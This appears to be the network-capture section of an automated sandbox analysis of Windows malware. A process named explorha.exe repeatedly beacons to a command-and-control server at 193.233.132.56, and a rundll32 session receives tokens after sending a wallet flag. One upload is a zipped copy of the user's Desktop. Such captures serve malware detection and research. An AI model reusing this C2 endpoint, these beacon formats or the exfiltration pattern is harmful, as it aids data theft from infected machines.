                                                                                                    Apr 19, 2024 04:26:14.943986893 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 6a 45 30 4d 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                    Data Ascii: ------NjE0MA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Apr 19, 2024 04:26:15.213531017 CEST | 190 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:08.203963041 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:08.450815916 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:08.451720953 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:08.702778101 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 193.233.132.56 | 80 | 6704 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:08.422561884 CEST | 159 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 5
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 77 6c 74 3d 31
                                                                                                    Data Ascii: wlt=1
Apr 19, 2024 04:26:08.674129009 CEST | 719 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 61 30 31 39 39 36 36 34 31 64 61 32 63 61 66 38 66 32 30 61 30 39 62 65 64 64 31 65 32 38 61 62 64 30 31 66 62 61 35 35 64 66 32 33 63 61 61 61 62 33 62 62 37 62 65 65 61 39 66 62 62 35 31 61 36 38 62 64 65 35 36 61 36 30 37 31 38 62 37 33 63 34 30 64 2d 31 2d 5f 32 5f 66 32 30 32 39 66 32 63 32 62 66 64 38 34 63 62 61 30 35 30 35 61 66 35 39 62 30 63 37 63 39 61 38 36 34 36 65 66 31 33 38 66 32 65 62 61 66 34 66 66 62 31 37 62 64 66 61 66 61 66 65 32 36 65 33 39 65 66 62 36 33 31 32 37 32 34 66 64 37 66 63 33 37 65 2d 32 2d 5f 33 5f 38 65 31 65 66 65 36 36 31 65 39 39 63 32 62 38 61 62 30 39 33 62 66 37 66 37 32 33 30 37 38 62 63 30 34 61 62 34 34 35 64 61 32 63 38 61 66 39 61 63 66 61 30 62 64 38 66 35 66 30 62 61 31 62 34 35 66 38 2d 33 2d 5f 34 5f 38 36 33 38 63 64 36 66 30 38 61 38 64 39 62 64 62 30 30 66 30 32 38 38 66 63 30 66 31 63 39 38 66 66 37 35 62 39 36 61 62 63 36 63 61 35 66 39 62 61 65 32 32 63 64 37 65 34 64 34 39 35 34 62 36 33 65 38 2d 34 2d 5f 35 5f 66 36 34 38 64 64 37 37 33 34 38 33 38 35 65 31 62 66 30 30 35 65 61 64 65 39 33 65 30 37 65 38 64 62 35 66 39 38 34 61 62 63 32 61 62 62 39 65 38 62 66 65 30 36 66 31 64 61 63 33 65 30 35 30 33 39 63 35 66 32 34 37 34 61 37 66 66 32 36 36 61 30 37 30 64 37 38 63 34 61 62 66 63 61 61 62 64 63 30 66 62 30 66 65 65 30 33 39 39 33 33 39 61 36 65 32 35 61 34 61 31 63 34 32 31 36 63 39 65 35 33 37 31 63 39 32 61 32 38 66 36 35 30 35 38 38 31 37 32 66 35 62 35 30 36 62 39 37 36 33 39 64 65 32 38 31 30 65 31 66 35 36 37 31 38 35 32 35 63 31 62 66 65 39 65 38 39 39 30 66 2d 35 2d 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 210 +++_1_a01996641da2caf8f20a09bedd1e28abd01fba55df23caaab3bb7beea9fbb51a68bde56a60718b73c40d-1-_2_f2029f2c2bfd84cba0505af59b0c7c9a8646ef138f2ebaf4ffb17bdfafafe26e39efb6312724fd7fc37e-2-_3_8e1efe661e99c2b8ab093bf7f723078bc04ab445da2c8af9acfa0bd8f5f0ba1b45f8-3-_4_8638cd6f08a8d9bdb00f0288fc0f1c98ff75b96abc6ca5f9bae22cd7e4d4954b63e8-4-_5_f648dd77348385e1bf005eade93e07e8db5f984abc2abb9e8bfe06f1dac3e05039c5f2474a7ff266a070d78c4abfcaabdc0fb0fee0399339a6e25a4a1c4216c9e5371c92a28f650588172f5b506b97639de2810e1f56718525c1bfe9e8990f-5-0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:09.061721087 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:09.306716919 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:09.307878971 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:09.558798075 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49746 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:09.927654982 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:10.177648067 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:10.178817034 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:10.432334900 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    11 | 192.168.2.4 | 49747 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:10.793979883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:11.043517113 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:11.044610023 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:11.298471928 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    12 | 192.168.2.4 | 49748 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:11.656847954 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:11.902546883 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:11.903152943 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:12.152231932 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    13 | 192.168.2.4 | 49749 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:12.498990059 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:12.742294073 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:12.745601892 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:12.991785049 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    14 | 192.168.2.4 | 49750 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:13.350413084 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:13.601557970 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:13.605001926 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:13.859632015 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    15 | 192.168.2.4 | 49751 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:14.242257118 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:14.480489969 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:14.481188059 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:14.725044966 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    16 | 192.168.2.4 | 49752 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:15.083931923 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:15.333383083 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:15.334216118 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:15.588922024 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:15.952924967 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:16.198456049 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:16.199172020 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:16.449670076 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:16.807365894 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
